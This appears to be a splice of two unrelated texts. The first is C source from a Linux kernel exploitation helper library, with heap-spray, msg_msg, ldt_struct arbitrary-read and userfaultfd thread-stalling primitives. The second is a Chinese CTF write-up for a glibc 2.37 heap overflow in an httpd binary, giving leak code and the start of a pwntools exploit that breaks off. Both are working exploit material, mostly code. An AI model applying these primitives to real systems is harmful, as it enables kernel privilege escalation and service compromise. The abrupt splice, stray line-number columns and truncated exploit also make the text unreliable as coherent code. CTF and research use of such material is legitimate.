    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* mark every slot empty so freeing an unused slot cannot close a random fd */
    for (int i = 0; i < PGV_PAGE_NUM; i++) {
        socket_fd[i] = -1;
    }

    /* create an isolated namespace */
    unshare_setup();

    /* handle requests */
    for (;;) {
        if (read(cmd_pipe_req[0], &req, sizeof(req)) != (ssize_t)sizeof(req)) {
            /* pipe closed or broken: do not replay the previous request */
            break;
        }

        ret = -1;
        switch (req.cmd) {
        case CMD_ALLOC_PAGE:
        case CMD_FREE_PAGE:
            if (req.idx < 0 || req.idx >= PGV_PAGE_NUM) {
                printf("[x] invalid page index: %d\n", req.idx);
                break;
            }
            if (req.cmd == CMD_ALLOC_PAGE) {
                ret = create_socket_and_alloc_pages(req.size, req.nr);
                socket_fd[req.idx] = ret;
            } else {
                ret = close(socket_fd[req.idx]);
                socket_fd[req.idx] = -1;
            }
            break;
        case CMD_EXIT:
            ret = 0;
            break;
        default:
            printf("[x] invalid request: %d\n", req.cmd);
            break;
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));

        if (req.cmd == CMD_EXIT) {
            break;
        }
    }
}

#define PIPE_SPRAY_NUM 200

/* number of single-page allocations; they use slots 0 .. PGV_1PAGE_SPRAY_NUM-1 */
#define PGV_1PAGE_SPRAY_NUM 0x20

/* the 4-page allocations use the slots right after the single-page ones */
#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x40

/* the 8-page allocations use the slots right after the 4-page ones */
#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x40

/* cursors into each slot range; advanced by the code that frees sprayed pages */
int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

/*
 * Initialise the pgv page-spray subsystem: create the request/reply pipes and
 * fork the child that serves spray commands in spray_cmd_handler().
 *
 * Returns in the parent only. Failure to create a pipe or to fork is fatal
 * (err_exit), because alloc_page()/free_page() would otherwise wait forever
 * for a reply.
 */
void prepare_pgv_system(void)
{
    pid_t child;

    /* pipes for pgv commands and replies */
    if (pipe(cmd_pipe_req) < 0 || pipe(cmd_pipe_reply) < 0) {
        err_exit("pipe for pgv");
    }

    /* child process for pages spray */
    child = fork();
    if (child < 0) {
        err_exit("fork for pgv");
    }
    if (child == 0) {
        spray_cmd_handler();
        /* the child must not fall back into the caller's code once the handler ends */
        _exit(EXIT_SUCCESS);
    }
}

/*
 * Pre-allocate the sprayed pages through the child process: 1-page blocks
 * first, then 4-page blocks, then 8-page blocks. While the 8-page blocks are
 * allocated, some of the earlier blocks are freed again at fixed intervals.
 * Allocation failures are only reported, not treated as fatal.
 */
void prepare_pgv_pages(void)
{
/**
 * We want clean and contiguous memory here, which requires keeping the
 * noise low while order-3 pages are allocated.
 * So the pages for the noisy objects are pre-allocated here.
 */
puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
if (alloc_page(i, 0x1000, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

/* spray 8 pages for page-level heap fengshui */
puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
/* a socket needs 1 obj: sock_inode_cache, 19 objs for 1 slub on 4 pages */
if (i % 19 == 0) {
free_page(pgv_4pages_start_idx++);
}

/* a socket needs 1 dentry: dentry, 21 objs for 1 slub on 1 page */
if (i % 21 == 0) {
/* the cursor is advanced by 2 first, then that slot is freed */
free_page(pgv_1page_start_idx += 2);
}

/* a pgv needs 1 obj: kmalloc-8, 512 objs for 1 slub on 1 page */
if (i % 512 == 0) {
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0) {
printf("[x] failed to create %d socket for pages spraying!\n", i);
}
}

puts("");
}

/**
* IV - keyctl related
*/

/**
 * MUSL does not ship `keyctl.h` either :(
 * Luckily we only need a few macros for exploitation,
 * so defining them directly here is fine :)
 */

#define KEY_SPEC_PROCESS_KEYRING -2 /* - key ID for process-specific keyring */
#define KEYCTL_UPDATE 2 /* update a key */
#define KEYCTL_REVOKE 3 /* revoke a key */
#define KEYCTL_UNLINK 9 /* unlink a key from a keyring */
#define KEYCTL_READ 11 /* read a key or keyring's contents */

/*
 * Add a key of type "user" with the given description and payload to the
 * process keyring. Returns the result of the add_key syscall.
 */
int key_alloc(char *description, void *payload, size_t plen)
{
    long key_id = syscall(__NR_add_key, "user", description, payload, plen,
                          KEY_SPEC_PROCESS_KEYRING);

    return key_id;
}

/* Replace the payload of key `keyid` (KEYCTL_UPDATE). Returns the syscall result. */
int key_update(int keyid, void *payload, size_t plen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UPDATE, keyid, payload, plen);

    return rc;
}

/* Read the payload of key `keyid` into buffer (KEYCTL_READ). Returns the syscall result. */
int key_read(int keyid, void *buffer, size_t buflen)
{
    long rc = syscall(__NR_keyctl, KEYCTL_READ, keyid, buffer, buflen);

    return rc;
}

/* Revoke key `keyid` (KEYCTL_REVOKE). Returns the syscall result. */
int key_revoke(int keyid)
{
    long rc = syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0);

    return rc;
}

/* Unlink key `keyid` from the process keyring (KEYCTL_UNLINK). Returns the syscall result. */
int key_unlink(int keyid)
{
    long rc = syscall(__NR_keyctl, KEYCTL_UNLINK, keyid, KEY_SPEC_PROCESS_KEYRING);

    return rc;
}

/**
* V - sk_buff spraying related
* note that the sk_buff's tail is with a 320-bytes skb_shared_info
*/
#define SOCKET_NUM 8
#define SK_BUFF_NUM 128

/**
* socket's definition should be like:
* int sk_sockets[SOCKET_NUM][2];
*/

/*
 * Fill sk_socket with SOCKET_NUM AF_UNIX stream socket pairs.
 * Returns 0 on success, or -1 after reporting the first pair that failed.
 */
int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
    int pair_idx = 0;

    /* socket pairs to spray sk_buff */
    while (pair_idx < SOCKET_NUM) {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[pair_idx]) < 0) {
            printf("[x] failed to create no.%d socket pair!\n", pair_idx);
            return -1;
        }
        pair_idx++;
    }

    return 0;
}

/*
 * Write `size` bytes from buf SK_BUFF_NUM times into the first end of each of
 * the SOCKET_NUM socket pairs, pair by pair.
 * Returns 0 on success, or -1 after reporting the first failed write.
 */
int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int n = 0; n < SOCKET_NUM * SK_BUFF_NUM; n++) {
        int sock_idx = n / SK_BUFF_NUM;
        int msg_idx = n % SK_BUFF_NUM;

        if (write(sk_socket[sock_idx][0], buf, size) < 0) {
            printf("[x] failed to spray %d sk_buff for %d socket!", msg_idx, sock_idx);
            return -1;
        }
    }

    return 0;
}

/*
 * Read `size` bytes into buf SK_BUFF_NUM times from the second end of each of
 * the SOCKET_NUM socket pairs, pair by pair.
 * Returns 0 on success, or -1 after reporting the first failed read.
 */
int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int n = 0; n < SOCKET_NUM * SK_BUFF_NUM; n++) {
        int sock_idx = n / SK_BUFF_NUM;

        if (read(sk_socket[sock_idx][1], buf, size) < 0) {
            puts("[x] failed to received sk_buff!");
            return -1;
        }
    }

    return 0;
}

/**
* VI - msg_msg related
*/

#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/*
 * Userspace copy of a message header, with every pointer-sized member stored
 * as a raw 64-bit value; filled in by build_msg().
 */
struct msg_msg {
struct list_head m_list;
uint64_t m_type;
uint64_t m_ts;
uint64_t next;
uint64_t security;
};

/* Userspace copy of a message segment header: a single raw 64-bit link. */
struct msg_msgseg {
uint64_t next;
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

/* Create a new private message queue with mode 0666; returns msgget()'s result. */
int get_msg_queue(void)
{
    int queue_flags = IPC_CREAT | 0666;

    return msgget(IPC_PRIVATE, queue_flags);
}

/* Receive one message of type msgtyp from the queue with no flags; returns msgrcv()'s result. */
ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int no_flags = 0;

    return msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);
}

/**
 * Send one message on the queue.
 * msgp must point to a `struct msgbuf` whose payload is stored in mtext;
 * its mtype is set to msgtyp before sending. Returns msgsnd()'s result.
 */
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    struct msgbuf *header = (struct msgbuf*)msgp;

    header->mtype = msgtyp;

    return msgsnd(msqid, msgp, msgsz, 0);
}

/*
 * Copy a message without removing it from the queue. With MSG_COPY, `msgtyp`
 * selects the no.msgtyp message on the queue. Returns msgrcv()'s result.
 */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
 * Sometimes we may want to compile the exp binary with MUSL-GCC, which
 * does not ship the `asm/ldt.h` file.
 * As the file is small, it is copied here directly :)
 */

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
* Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
* not to the default values if you still want to do syscalls. This
* call is more for 32bit mode therefore.
*/
/*
 * Descriptor argument passed to modify_ldt(); a local copy of the structure
 * from `asm/ldt.h`, for toolchains that lack the header.
 */
struct user_desc {
unsigned int entry_number;
unsigned int base_addr;
unsigned int limit;
/* one-bit and two-bit flags, packed as bitfields */
unsigned int seg_32bit:1;
unsigned int contents:2;
unsigned int read_exec_only:1;
unsigned int limit_in_pages:1;
unsigned int seg_not_present:1;
unsigned int useable:1;
#ifdef __x86_64__
/*
 * Because this bit is not present in 32-bit user code, user
 * programs can pass uninitialized values here. Therefore, in
 * any context in which a user_desc comes from a 32-bit program,
 * the kernel must act as though lm == 0, regardless of the
 * actual value.
 */
unsigned int lm:1;
#endif
};

#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/* this should be referred to your kernel */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/*
 * Descriptor initializer: entry number 0x8000 / 8, base address 0xff0000,
 * and every other field (limit and all flag bits) cleared.
 */
static inline void init_desc(struct user_desc *desc)
{
    /* the two non-zero fields */
    desc->entry_number = 0x8000 / 8;
    desc->base_addr = 0xff0000;

    /* everything else is zero */
    desc->limit = 0;
    desc->seg_32bit = 0;
    desc->contents = 0;
    desc->read_exec_only = 0;
    desc->limit_in_pages = 0;
    desc->seg_not_present = 0;
    desc->useable = 0;
    desc->lm = 0;
}

/**
 * @brief brute-force search for page_offset_base by modifying ldt_struct
 *
 * Starting at 0xffff888000000000, each candidate is handed to ldt_momdifier
 * and then probed with an 8-byte modify_ldt() read; the search stops at the
 * first candidate for which the read returns a positive value.
 *
 * @param ldt_cracker function to make the ldt_struct modifiable
 * @param cracker_args args of ldt_cracker
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param burte_size step added to the candidate after each failed probe
 * @return size_t the candidate that succeeded, or (size_t)-1 if modify_ldt()
 *         returned 0
 */
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
                                        void *cracker_args,
                                        void *(*ldt_momdifier)(void*, size_t),
                                        void *momdifier_args,
                                        uint64_t burte_size)
{
    struct user_desc desc;
    /* local candidate; deliberately not named like the global page_offset_base */
    uint64_t candidate = 0xffff888000000000;
    uint64_t temp = 0;
    int retval;

    /* init descriptor info */
    init_desc(&desc);

    /* make the ldt_struct modifiable */
    ldt_cracker(cracker_args);
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

    /* probe candidates with modify_ldt() reads until one succeeds */
    while(1) {
        ldt_momdifier(momdifier_args, candidate);
        retval = syscall(SYS_modify_ldt, 0, &temp, 8);
        if (retval > 0) {
            break;
        }
        if (retval == 0) {
            printf("[x] no mm->context.ldt!\n");
            candidate = -1;
            break;
        }
        candidate += burte_size;
    }

    return candidate;
}

/**
 * @brief read 0x8000 bytes through the LDT after pointing
 *        ldt_struct->entries at addr.
 *        Note that ldt_guessing_direct_mapping_area() should be called
 *        first, and this function should be used in that caller process.
 *
 * The read itself is done by a forked child, which sends the data back
 * through a pipe; the parent waits for the child and then copies the data
 * into res_buf.
 *
 * @param ldt_momdifier  function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param addr           address to read from
 * @param res_buf        destination buffer; must hold at least 0x8000 bytes
 */
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
                        void *momdifier_args, size_t addr, char *res_buf)
{
    static char buf[0x8000];
    int pipe_fd[2];
    int pid;

    /* modify the ldt_struct->entries to addr */
    ldt_momdifier(momdifier_args, addr);

    if (pipe(pipe_fd) < 0) {
        err_exit("pipe");
    }

    pid = fork();
    if (pid < 0) {
        /* without a child nobody fills the pipe and read() would block */
        err_exit("fork");
    }

    if (pid == 0) {
        /* child: read through the LDT and ship the bytes to the parent */
        syscall(SYS_modify_ldt, 0, buf, 0x8000);
        write(pipe_fd[1], buf, 0x8000);
        exit(0);
    }

    /* parent */
    wait(NULL);
    read(pipe_fd[0], res_buf, 0x8000);

    close(pipe_fd[0]);
    close(pipe_fd[1]);
}

/**
 * @brief scan memory in 0x8000-byte windows until mem_finder reports a hit.
 *        Note that ldt_guessing_direct_mapping_area() should be called
 *        first, and this function should be used in that caller process.
 *
 * Each window is fetched with ldt_arbitrary_read() and handed to mem_finder.
 * The scan has no upper bound: the function only returns once mem_finder
 * returns something other than (size_t)-1.
 *
 * @param ldt_momdifier    function to modify the ldt_struct->entries
 * @param momdifier_args   args of ldt_momdifier
 * @param page_offset_base address the scan starts from
 * @param mem_finder       your own function to search a 0x8000-byte buf.
 *                         It should look like
 *                         `size_t func(void *args, char *buf)`, where `buf`
 *                         holds the window just read. It returns the offset
 *                         of the match inside `buf`, or `-1` if none
 * @param finder_args      your own function's args
 * @return size_t          window address plus the offset mem_finder returned
 */
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
                          void *momdifier_args, uint64_t page_offset_base,
                          size_t (*mem_finder)(void*, char *), void *finder_args)
{
    static char buf[0x8000];
    size_t window = page_offset_base;

    for (;; window += 0x8000) {
        size_t hit;

        ldt_arbitrary_read(ldt_momdifier, momdifier_args, window, buf);

        hit = mem_finder(finder_args, buf);
        if (hit != (size_t)-1) {
            return window + hit;
        }
    }
}

/**
* VIII - userfaultfd related code
*/

/**
* musl doesn't ship `userfaultfd.h` either :(
* Luckily we only need a few macros for exploitation,
* so defining them directly here is fine :)
*/

#define UFFD_API ((uint64_t)0xAA)
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/*
* Message layout read from the userfaultfd descriptor; the handler in this
* file fills it with read(uffd, &msg, sizeof(msg)).
* `event` is compared against UFFD_EVENT_PAGEFAULT, and for that event
* `arg.pagefault.address` is the address the handler rounds down to a
* 0x1000 boundary before issuing UFFDIO_COPY.
* The other union members are declared but not used by the visible code.
*/
struct uffd_msg {
uint8_t event;

uint8_t reserved1;
uint16_t reserved2;
uint32_t reserved3;

union {
struct {
uint64_t flags;
uint64_t address;
union {
uint32_t ptid;
} feat;
} pagefault;

struct {
uint32_t ufd;
} fork;

struct {
uint64_t from;
uint64_t to;
uint64_t len;
} remap;

struct {
uint64_t start;
uint64_t end;
} remove;

struct {
/* unused reserved fields */
uint64_t reserved1;
uint64_t reserved2;
uint64_t reserved3;
} reserved;
} arg;
} __attribute__((packed));

#define UFFD_EVENT_PAGEFAULT 0x12

struct uffdio_api {
uint64_t api;
uint64_t features;
uint64_t ioctls;
};

struct uffdio_range {
uint64_t start;
uint64_t len;
};

struct uffdio_register {
struct uffdio_range range;
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
uint64_t mode;
uint64_t ioctls;
};


struct uffdio_copy {
uint64_t dst;
uint64_t src;
uint64_t len;
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
uint64_t mode;
int64_t copy;
};

//#include <linux/userfaultfd.h>

char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

/**
* @brief userfaultfd monitor thread that stalls once a fault message arrives
*
* Waits with poll() for the descriptor to become readable, reads one
* uffd_msg, and then sleeps for 100000000 seconds before looking at the
* result. The validation of the read and the UFFDIO_COPY that would resolve
* the fault only run after that sleep returns, so in practice the faulting
* thread stays blocked.
*
* @param args the userfaultfd descriptor, passed as a `long` cast to `void *`
* @return NULL, after the single UFFDIO_COPY has been issued
*/
void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
/* NOTE(review): fault_cnt is never read or updated below */
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
/* timeout -1: block until the descriptor is readable */
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/*
* Staying stuck here is intentional: nothing below runs until this
* sleep returns, including the checks on nread.
*/
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

/* fill the 0x1000-aligned faulting page from temp_page_for_stuck */
uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

/* the loop body returns on its first complete pass */
return NULL;
}
}

/**
 * @brief register [buf, buf + len) with userfaultfd, using
 *        uffd_handler_for_stucking_thread as the monitor thread
 *
 * @param monitor_thread receives the id of the created handler thread
 * @param buf            start of the range to register
 * @param len            length of the range to register
 */
void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
                                              void *buf, unsigned long len)
{
    void *(*stall_handler)(void *) = uffd_handler_for_stucking_thread;

    register_userfaultfd(monitor_thread, buf, len, stall_handler);
}


/**
* IX - kernel structures
*/

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

/*
* Local declaration of `struct seq_file`, listed under this header's
* "kernel structures" section so user-space code can refer to its fields.
* NOTE(review): the layout presumably has to match the target kernel's
* definition — confirm against the kernel version in use.
*/
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
size_t pad_until;
loff_t index;
loff_t read_pos;
uint64_t lock[4]; // 32-byte stand-in for the kernel's `struct mutex lock`
const struct seq_operations *op;
int poll_event;
const struct file *file;
void *private;
};

/*
* Local declaration of `struct seq_operations` (part of this header's
* "kernel structures" section): four function pointers, in the order
* start, stop, next, show. `struct seq_file::op` points to one of these.
*/
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};

struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
const struct file_operations *proc_fops;
};

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/*
* Local declaration of `struct pipe_buffer` (part of this header's
* "kernel structures" section).
* Original author's note: read start from len to offset, write start from
* offset.
* NOTE(review): the exact meaning of `offset`/`len` is not established by
* this file — confirm against the kernel's pipe implementation.
*/
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif

safehttpd

1
GNU C Library (Ubuntu GLIBC 2.37-0ubuntu1) stable release version 2.37.
1
2
3
4
5
6
httpd: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=eaa5ba1189be005fab91f8b22ca2d02415cb5faa, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

由 setlocale 引发的 sprintf 堆溢出:

1
setlocale(LC_ALL, v3 + 1);
1
2
3
4
5
chunk = (Chunk *)malloc(0x40uLL);
chunk->data = (char *)malloc(size);
memset(chunk->data, 0, size);
chunk->size = size;
sprintf((char *)&chunk->info, "%-8s:%-13s:%-'8d", name, pswd, uid);
  • 本题目 libc 版本为 2.37-0ubuntu1 刚好存在此漏洞

入侵思路

题目有两次泄露的机会,先构造大量的 fast chunk,然后利用 fastbin 合并机制生成一个 unsorted chunk,利用 GET /init 功能不会置空 chunk 的特点可以用于泄露 libc_base

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
for i in range(0x20):
register(i,64,str(i))

for i in range(0x1f):
logoff(str(i))

register(1,1024,"1")

payload = "GET /init"
sl(payload)
payload = "Stdout: 3"
sl(payload)
sl("")

seed = lib.time(0)
lib.srand(seed)
pswd = ""

for i in range(13):
num = lib.rand() % 0x100
while(num >= 0x7f or num <= 0x20):
num = lib.rand() % 0x100
print(hex(num))
pswd += chr(num)
success(pswd)

show("root",pswd,1)

ru("Content-type: text/html")
leak_addr = u64(ru("\x7f")[-5:].ljust(8,b"\x00"))+0x7f*0x10000000000
libc_base = leak_addr - 0x1f72d0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

另外利用 passwd="a:0" 可以绕过如下的检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
__int64 __fastcall check(char *uid, int a2)
{
unsigned int v3; // [rsp+14h] [rbp-8h]
int i; // [rsp+18h] [rbp-4h]

v3 = 0;
for ( i = 0; i < a2; ++i )
{
if ( uid[i] > 0x2F && uid[i] <= 0x39 )
v3 = 10 * v3 + uid[i] - 0x30;
}
return v3;
}

接下来利用漏洞就可以使 sprintf 造成一字节的堆溢出,覆盖后续指针的末尾一字节为 \x00,进而释放一片正在使用的区域

利用堆风水可以释放一个正在使用的 info chunk(0x51),然后将其申请回来就可以使 new info chunk(0x51) 两次出现在循环链表中

  • 一次源自于覆写 info chunk(0x51) 为 new info chunk(0x51)
  • 另一次则是 new info chunk(0x51) 本身的插链

最后利用 UAF 劫持 tcache,申请并伪造 _IO_list_all 打 house of cat 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
# -*- coding:utf-8 -*-
from pwn import *
from ctypes import *

arch = 64
challenge = './httpd1'

context.os='linux'
context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')
lib = cdll.LoadLibrary("libc.so.6")

# Short aliases around the pwntools tube `p` (created further down the script).
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# lg takes the NAME of a variable, evaluates it, and logs it in colour.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Pad short leaks with NUL bytes before unpacking; the fill must be one byte.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

b = "set debug-file-directory ./debug/\n"
